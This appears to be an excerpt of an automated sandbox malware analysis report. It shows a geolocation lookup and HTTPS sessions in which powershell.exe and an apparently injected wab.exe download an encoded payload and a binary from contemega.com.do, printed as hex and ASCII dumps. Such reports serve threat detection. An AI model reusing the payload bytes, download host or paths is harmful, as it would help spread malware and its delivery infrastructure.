                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.949707192.185.112.2524437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-01 14:19:06 UTC176OUTGET /Nedslagnings.dwp HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: contemega.com.do
                                        Connection: Keep-Alive
                                        2024-07-01 14:19:06 UTC261INHTTP/1.1 200 OK
                                        Date: Mon, 01 Jul 2024 14:19:06 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Mon, 01 Jul 2024 07:48:56 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 478448
                                        content-Security-Policy: upgrade-insecure-requests
                                        2024-07-01 14:19:06 UTC7931INData Raw: 32 66 73 50 61 4f 44 72 51 69 35 69 76 53 74 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 65 6d 6e 41 41 41 41 44 2b 6e 46 33 73 76 72 56 61 65 58 59 77 38 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 6e 4a 79 63 36 59 77 2f 59 36 57 59 50 32 50 33 72 51 41 70 4f 31 6a 37 58 31 39 66 58 31 39 66
                                        Data Ascii: 2fsPaODrQi5ivStlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZemnAAAAD+nF3svrVaeXYw8nJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJyc6Yw/Y6WYP2P3rQApO1j7X19fX19f
                                        2024-07-01 14:19:06 UTC8000INData Raw: 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 44 34 47 36 41 41 41 41 5a 67 2f 72 2f 64 6a 53 36 31 4d 76 50 43 4a 77 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 5a 75 62 5a 67 39 7a 39 73 76 72 56 68 6c 53 4d 41 66 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50
                                        Data Ascii: 5eXl5eXl5eXl5eXl5D4G6AAAAZg/r/djS61MvPCJw/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/ZubZg9z9svrVhlSMAf4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+P
                                        2024-07-01 14:19:06 UTC8000INData Raw: 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 71 42 38 69 4e 57 50 71 76 5a 36 49 66 32 36 31 54 66 44 67 56 46 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 2f 70 72 67 41 41 41 4e 6e 51 5a 67 2f 70 2f 75 73 2b 51 64 34 75 44 5a 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70 71 61 6d 70
                                        Data Ascii: 6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enqB8iNWPqvZ6If261TfDgVFT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0/prgAAANnQZg/p/us+Qd4uDZqampqampqampqampqampqampqampqamp
                                        2024-07-01 14:19:06 UTC8000INData Raw: 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 46 78 63 58 41 2b 42 70 41 41 41 41 4e 33 54 44 32 37 61 36 31 49 6b 39 35 41 30 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 6d 77 39 31 39 51 2f 34 39 65 74 43 73 34 61 4e 47 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64
                                        Data Ascii: cXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXA+BpAAAAN3TD27a61Ik95A0rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6umw919Q/49etCs4aNGdXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1d
                                        2024-07-01 14:19:06 UTC8000INData Raw: 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 2b 6e 48 41 41 41 41 44 2f 37 50 44 2f 58 66 36 31 72 47 69 79 59 65 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 67 6f 4b 43 4c 68 4e 33 42 32 66 7a 72 58 54 6e 36 4f 78
                                        Data Ascii: vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL+nHAAAAD/7PD/Xf61rGiyYeoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCLhN3B2fzrXTn6Ox
                                        2024-07-01 14:19:06 UTC8000INData Raw: 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 42 77 63 48 41 50 67 62 4d 41 41 41 43 51 33 76 6e 72 54 68 59 65 6a 56 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 5a 76 5a 2b 32 59 50 2f 4e 50 72 56 34 43 69 37 6d 71 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35 65 58 6c 35
                                        Data Ascii: wcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHAPgbMAAACQ3vnrThYejVkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGZvZ+2YP/NPrV4Ci7mqXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5
                                        2024-07-01 14:19:07 UTC8000INData Raw: 30 72 75 73 2f 50 65 50 6b 46 42 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 44 2f 6e 38 32 66 54 72 51 6c 51 4e 64 67 49 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 49 45 30 42 79 76 46 66 71 76 5a 37 41 39 79 38 33 4c 72 56 76 74 66 35 46 2f 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39
                                        Data Ascii: 0rus/PePkFBERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERD/n82fTrQlQNdgIMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDIE0ByvFfqvZ7A9y83LrVvtf5F/b29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29
                                        2024-07-01 14:19:07 UTC8000INData Raw: 35 52 31 62 48 70 78 44 38 31 47 62 6a 73 52 79 56 42 2f 4b 69 57 47 57 70 4b 38 55 74 45 48 74 4d 67 42 2b 71 4e 73 48 73 4a 41 62 2f 61 50 4a 75 63 43 4f 69 78 70 6e 73 38 64 39 6e 58 59 4e 38 44 4d 77 77 36 4f 32 2b 71 49 4b 71 47 4d 45 34 47 51 43 49 56 30 57 76 66 6c 6d 65 72 78 62 38 7a 39 2b 65 68 43 55 51 58 65 56 39 42 74 6a 4b 75 5a 6e 42 75 73 6d 76 6f 30 34 49 58 33 77 45 72 34 50 57 58 6f 4c 71 6b 49 48 2f 61 48 6f 51 41 72 57 71 4e 69 75 66 5a 62 48 2f 51 4b 73 45 54 78 52 34 54 75 4f 77 4b 63 56 2b 77 35 46 37 4a 6d 78 44 57 79 38 6b 34 35 4c 42 4f 43 33 2b 77 79 72 73 74 61 57 47 44 6b 53 52 6f 62 32 4e 62 79 72 45 54 2b 43 30 2b 6b 78 42 64 67 73 57 69 41 45 55 4a 4b 38 2f 35 78 67 4d 41 77 7a 43 52 6b 41 53 4d 79 6a 2f 65 4a 4a 32 46 2b
                                        Data Ascii: 5R1bHpxD81GbjsRyVB/KiWGWpK8UtEHtMgB+qNsHsJAb/aPJucCOixpns8d9nXYN8DMww6O2+qIKqGME4GQCIV0Wvflmerxb8z9+ehCUQXeV9BtjKuZnBusmvo04IX3wEr4PWXoLqkIH/aHoQArWqNiufZbH/QKsETxR4TuOwKcV+w5F7JmxDWy8k45LBOC3+wyrstaWGDkSRob2NbyrET+C0+kxBdgsWiAEUJK8/5xgMAwzCRkASMyj/eJJ2F+
                                        2024-07-01 14:19:07 UTC8000INData Raw: 64 6a 4b 4b 79 6f 42 4d 4c 47 65 6e 48 38 58 47 74 74 72 52 39 2f 72 4b 78 78 65 61 4c 59 59 42 2f 49 43 6f 66 34 5a 6d 37 49 32 37 2f 6e 77 39 76 59 46 4f 46 4e 6e 46 73 47 42 59 4e 58 33 33 73 6c 37 68 76 53 39 32 46 44 4f 42 34 4a 6b 49 38 4a 4e 49 4c 78 42 4a 65 39 6c 56 78 41 34 4b 4d 46 37 36 63 63 48 4a 79 7a 4c 34 61 59 63 76 7a 2f 79 35 34 66 75 70 33 54 36 37 2f 61 4a 54 61 39 6e 32 71 4e 68 6f 65 68 51 4c 2f 51 50 6b 58 50 79 32 69 7a 70 61 49 2b 61 76 44 70 79 63 2f 6a 72 49 6e 51 4c 36 74 71 62 43 43 41 79 59 4d 38 4f 43 42 67 2f 63 58 70 4e 64 36 31 38 39 39 73 78 59 47 4e 6e 72 6f 6d 66 58 5a 59 4d 51 50 4a 53 6f 66 34 66 75 36 6a 66 75 79 62 57 46 38 6b 43 4d 55 49 6a 73 42 2f 4b 65 78 34 6e 76 54 4e 69 4a 44 6a 64 4c 64 67 45 52 4b 6a 39
                                        Data Ascii: djKKyoBMLGenH8XGttrR9/rKxxeaLYYB/ICof4Zm7I27/nw9vYFOFNnFsGBYNX33sl7hvS92FDOB4JkI8JNILxBJe9lVxA4KMF76ccHJyzL4aYcvz/y54fup3T67/aJTa9n2qNhoehQL/QPkXPy2izpaI+avDpyc/jrInQL6tqbCCAyYM8OCBg/cXpNd61899sxYGNnromfXZYMQPJSof4fu6jfuybWF8kCMUIjsB/Kex4nvTNiJDjdLdgERKj9
                                        2024-07-01 14:19:07 UTC8000INData Raw: 71 54 51 55 6d 51 77 55 6a 50 56 72 67 47 66 70 30 6b 55 4f 61 37 6e 71 72 35 34 62 59 68 63 61 7a 77 32 59 55 7a 50 67 5a 41 57 55 52 61 55 4b 63 4c 52 44 7a 57 6f 42 50 71 6a 62 53 4b 41 4a 61 2f 31 68 56 6b 45 70 45 71 67 62 43 4e 44 61 75 39 37 6a 59 33 61 70 55 63 30 43 2f 74 71 56 30 48 4b 4e 4c 6e 6c 63 76 4f 2f 72 33 66 76 65 41 44 63 75 63 6e 31 6c 64 55 30 6d 41 72 69 74 67 68 33 6b 45 44 43 55 52 47 55 33 7a 31 38 4e 41 69 4b 67 72 54 50 74 54 4b 38 56 2b 5a 31 33 63 64 55 75 6d 58 78 69 33 64 43 69 64 75 70 50 74 47 38 75 46 78 42 4c 39 4f 70 43 4f 65 7a 61 2f 52 43 42 65 35 59 32 6b 37 50 4f 65 51 48 48 6e 75 54 78 37 51 6d 64 63 46 76 76 79 66 74 50 6c 75 6c 53 48 6a 39 5a 53 65 2f 4c 2f 62 53 76 56 66 36 74 34 66 6d 33 67 38 54 50 2f 57 42
                                        Data Ascii: qTQUmQwUjPVrgGfp0kUOa7nqr54bYhcazw2YUzPgZAWURaUKcLRDzWoBPqjbSKAJa/1hVkEpEqgbCNDau97jY3apUc0C/tqV0HKNLnlcvO/r3fveADcucn1ldU0mAritgh3kEDCURGU3z18NAiKgrTPtTK8V+Z13cdUumXxi3dCidupPtG8uFxBL9OpCOeza/RCBe5Y2k7POeQHHnuTx7QmdcFvvyftPlulSHj9ZSe/L/bSvVf6t4fm3g8TP/WB


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.960918192.185.112.2524431712C:\Program Files (x86)\Windows Mail\wab.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-01 14:19:51 UTC172OUTGET /zPwwF47.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: contemega.com.do
                                        Cache-Control: no-cache
                                        2024-07-01 14:19:51 UTC301INHTTP/1.1 200 OK
                                        Date: Mon, 01 Jul 2024 14:19:51 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Mon, 01 Jul 2024 07:45:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 494656
                                        content-Security-Policy: upgrade-insecure-requests
                                        Content-Type: application/octet-stream
                                        2024-07-01 14:19:51 UTC7891INData Raw: 33 6d ed d4 25 2f 6f ab 34 0b 98 95 af b5 23 43 b1 c4 87 3b d7 54 a0 64 6c 56 19 d0 5f 84 ea 74 6d 8f 0d d4 4c 02 90 6c 18 ae 35 2b 4d 23 2a 89 60 54 65 b9 fc 6e 61 66 7a b5 47 89 20 67 4c 4f 4f e8 02 3a 38 cb f6 49 89 5e 8d 99 ea f3 d4 4a ab 0b 07 b8 3b 96 d5 9a c3 f8 56 47 da d9 0f a6 0b da 6c c3 09 3d 79 93 52 f8 50 02 d5 76 b0 82 8e 31 74 b3 0f 6e f6 39 0d b5 0f 32 a5 76 e0 9c eb e9 f1 82 ec e4 15 d8 c7 86 1d 19 28 94 18 a2 18 ad d0 20 18 b3 30 a3 d7 82 97 3d 1d 4b 64 42 eb 81 97 b5 f5 7d e3 4f 8b d4 a4 a0 a5 c3 fb 28 e3 ca 70 55 1b 8c 2f 86 65 53 bb 26 30 74 17 ce 41 87 e3 cb 25 ba 50 4e 45 e8 db 7d 9d a3 f7 de 2d 84 04 ef 37 3c e6 14 ff f7 49 f7 c9 b5 fd 03 ad 30 24 c6 c6 67 1f 51 92 f0 20 16 8e 6f b2 b0 f6 33 5f 71 16 6e d5 a2 71 49 03 f5 fd 8e 49
                                        Data Ascii: 3m%/o4#C;TdlV_tmLl5+M#*`TenafzG gLOO:8I^J;VGl=yRPv1tn92v( 0=KdB}O(pU/eS&0tA%PNE}-7<I0$gQ o3_qnqII
                                        2024-07-01 14:19:51 UTC8000INData Raw: b9 4a ac 71 60 d2 17 e9 3d 83 1f 98 c8 14 e5 8e 93 cb 24 cb 8d 40 5b e5 d6 f4 1d 6e c4 6d 4f 85 96 84 02 32 e8 2b d6 fa 53 69 2b d6 83 81 72 d5 d9 f6 f1 98 8d b8 26 ca 16 56 c9 77 44 04 50 42 3c ac 95 bd 15 ee c8 ca 47 64 ee b4 e0 d3 2d 51 9a 58 e2 9a 66 a2 44 c8 1a dc 24 38 53 a6 f8 56 2a 81 5e 82 69 6d 9c 7f 2c 7d d5 74 10 68 e4 5f 3f 1b 88 c9 bf d3 8a d4 9a 83 73 8e 7c 04 aa 0a 2d 7e d2 87 f1 82 f2 91 ff ae 07 af 89 d5 ff f5 66 05 f9 a5 5a 84 a8 c5 eb ca f0 e3 31 b5 77 e0 6b 90 1a 70 44 9a 40 97 d6 cd ff 97 00 01 8e 9c 47 45 cf 86 52 e1 2f d4 b4 4a ef 3a 18 7d 75 81 e2 77 1b 03 2f 2a 84 5e c9 4e bf ca 80 68 c9 44 8b c3 59 eb db 0d 08 47 7c ca 16 b3 af 75 7c d1 8b b1 1e 18 b6 e6 0d 6d d8 9e e4 f1 fc 5e 91 ca 1e d3 e2 20 18 29 2a f4 2f ff 90 6f 89 26 f7
                                        Data Ascii: Jq`=$@[nmO2+Si+r&VwDPB<Gd-QXfD$8SV*^im,}th_?s|-~fZ1wkpD@GER/J:}uw/*^NhDYG|u|m^ )*/o&
                                        2024-07-01 14:19:51 UTC8000INData Raw: e8 7b 11 de df 31 b5 04 e2 aa ac c1 1d 5e 9e bb 57 8a 3c 9f 42 0a ed d4 3a d3 69 20 b6 72 b6 74 f3 14 0c 57 8e 23 38 dc eb 51 97 86 c9 7c ed a6 d5 9f d9 5c cc 0a 89 3f 4a 4e 4d 86 86 a2 6a 15 02 5c 31 dc 32 8f da 0a 33 70 5f f6 4d 7b 4a 1a 96 21 32 e0 17 2d 77 a2 ba cb 50 1c 61 80 bd f5 42 91 8e c7 1a fc 93 14 b8 cb 5c 56 d1 35 03 af e4 80 7a 4c 2d 14 6d a5 38 78 07 96 21 28 51 de 0b 2d e4 a0 57 c8 a5 fc 04 e3 7e dd 64 ca 39 ba 26 b3 b0 27 43 00 f8 b0 8f b8 bf 7a db 2b 91 e2 1b 5e 95 4a 48 8e a4 20 79 7f 10 cc 95 80 7d 77 02 ea 27 20 22 17 56 eb bc 46 62 35 c7 88 18 70 68 44 51 57 fc e0 36 16 84 b9 c9 c2 d8 94 b8 5e 66 2c 98 bc 7f 31 41 b6 52 00 6a 93 2a 60 3a 49 12 6d 88 7f ea 3a 97 cf 06 09 5f 64 b5 cb 2e e7 50 99 12 75 19 bb e7 67 fa c1 65 8e 3e cc f0
                                        Data Ascii: {1^W<B:i rtW#8Q|\?JNMj\123p_M{J!2-wPaB\V5zL-m8x!(Q-W~d9&'Cz+^JH y}w' "VFb5phDQW6^f,1ARj*`:Im:_d.Puge>
                                        2024-07-01 14:19:51 UTC8000INData Raw: 59 4b b5 84 fd 5d 01 57 63 1a 1d 29 e4 20 30 5a 15 6b 73 cc bd 82 02 b3 35 1b de 7d 15 ba 8c da 9c 5e 07 7f 5f 7c 25 87 60 4f 2a 05 38 ed b4 69 de a8 4d 47 cd 09 da c0 e8 ee e3 14 d8 b8 80 22 8c c2 ad 44 52 24 f7 ef 31 39 13 73 20 e0 0d 6d 60 5b 45 e6 34 0d a6 dd 4b dd 8a 84 f1 2a c6 b8 a5 eb 8b d8 76 d9 c2 65 ad b9 01 b5 47 6f 10 87 c7 3b 3d c7 97 38 1e a0 91 7e e2 a8 52 9f 17 ec f4 c1 ba 5e 60 24 8d 17 e1 8f 91 3c ab 8d a3 5f b6 b9 8b 12 8d 41 8c aa 16 09 f8 34 19 a5 b5 07 df c7 a7 f1 fe fa 9c 9a a4 01 4e 15 ed 05 e6 00 b1 81 49 5f 21 33 33 5a e4 21 d8 af 11 ff ae e4 f7 9a ef 7d 15 09 e4 cd d1 58 76 eb 3a 54 fc 8c 58 3a 2c 8b 47 c3 49 65 83 38 8f b1 9b d2 0c bf f2 af 6b d4 fd 2d a3 8a 7b f0 11 47 94 e2 e7 0f 27 b7 63 7a d2 d1 0a 1f 94 87 a3 35 e9 b6 c8
                                        Data Ascii: YK]Wc) 0Zks5}^_|%`O*8iMG"DR$19s m`[E4K*veGo;=8~R^`$<_A4NI_!33Z!}Xv:TX:,GIe8k-{G'cz5
                                        2024-07-01 14:19:51 UTC8000INData Raw: 6b 20 8c 6d e7 26 13 0e 80 11 41 72 2d 9c c2 c8 3d fa 39 cc e7 4e 5d 87 13 b0 b0 d7 fe bd 4e 88 74 1d d8 c2 7f 3b ad 76 68 c7 18 2a 02 c8 81 66 0e 5c 17 c4 c4 c4 60 98 aa 47 b8 35 d3 98 9b 70 67 65 57 09 3d 57 8b be 8b 41 8c ac 94 e9 f2 2e e1 5a 5c 21 ba 3b a7 2f 2d 3d ac 8d e6 eb d9 02 d8 ab 35 50 e6 89 9d 99 20 50 71 ba 49 9b 7e db 50 53 b1 62 83 a8 32 c6 24 b1 26 db 39 4f 3c 9d b0 37 bc 4a 64 3a c2 a8 47 c3 41 4d f7 85 72 10 90 34 0e 34 9e 8b 1b c9 55 90 f3 8e 7a 30 5d 47 2e 37 e6 0f 29 f6 23 0c dd 44 5f 10 50 7b 75 ab 26 b2 54 b5 24 b4 a4 17 6a 66 13 5f a7 b7 fe bc 79 51 0d d7 b4 da 88 b1 c2 20 aa 40 29 46 3b 08 c1 c5 64 9e 0f f3 b9 3d 0c 6f 5c a8 74 07 d7 2e e4 a3 65 e0 83 56 24 8c 68 b9 30 8d 33 be dd 34 3b 5a 91 b8 76 6b 95 47 58 f3 ec b9 08 e5 10
                                        Data Ascii: k m&Ar-=9N]Nt;vh*f\`G5pgeW=WA.Z\!;/-=5P PqI~PSb2$&9O<7Jd:GAMr44Uz0]G.7)#D_P{u&T$jf_yQ @)F;d=o\t.eV$h034;ZvkGX
                                        2024-07-01 14:19:51 UTC8000INData Raw: 71 e3 6e 91 8e da 5c a2 df 4c 68 4a c9 06 ae 8d 49 44 a4 66 2f a8 35 b7 a1 38 f4 84 ab b8 03 1d 3f 64 d8 db 50 53 64 83 83 a8 e2 01 31 6c 98 f4 38 4f 03 fc fc a8 ce f8 f8 59 23 d6 11 40 3d 4c 83 00 ec 1a d6 26 e4 12 e9 74 8c d2 6e 5d 3b eb 35 c8 0c af 58 66 0c 04 a5 73 6f 7c 6e 9f 1f ae 47 16 2a c6 da 8a 82 32 2b d8 dc 6a 95 99 c3 db 87 cf fe bc 91 c1 ff 10 4a 8a 05 0b 63 14 bf 1e 12 a9 cb 07 9d 2d 83 e8 98 24 8c 84 19 92 4a 95 89 7d e8 0a 51 32 59 c7 ab e7 d3 71 57 32 02 2a d7 14 ed cb 49 52 bd 61 a1 1f 0d 47 1f 9f ee b9 d5 7c e1 25 1f 6f 5e e2 6f 45 da 72 e6 d7 37 f8 bf d7 0a 41 6e 5c 39 9a 64 8e f9 aa e4 0b 0f a2 3e 9e 7f 8c a3 70 3f d9 5c 45 9c de 86 4b 78 6e ae 73 c0 da 62 b7 a2 8d 17 0e 95 cc 59 a4 9d 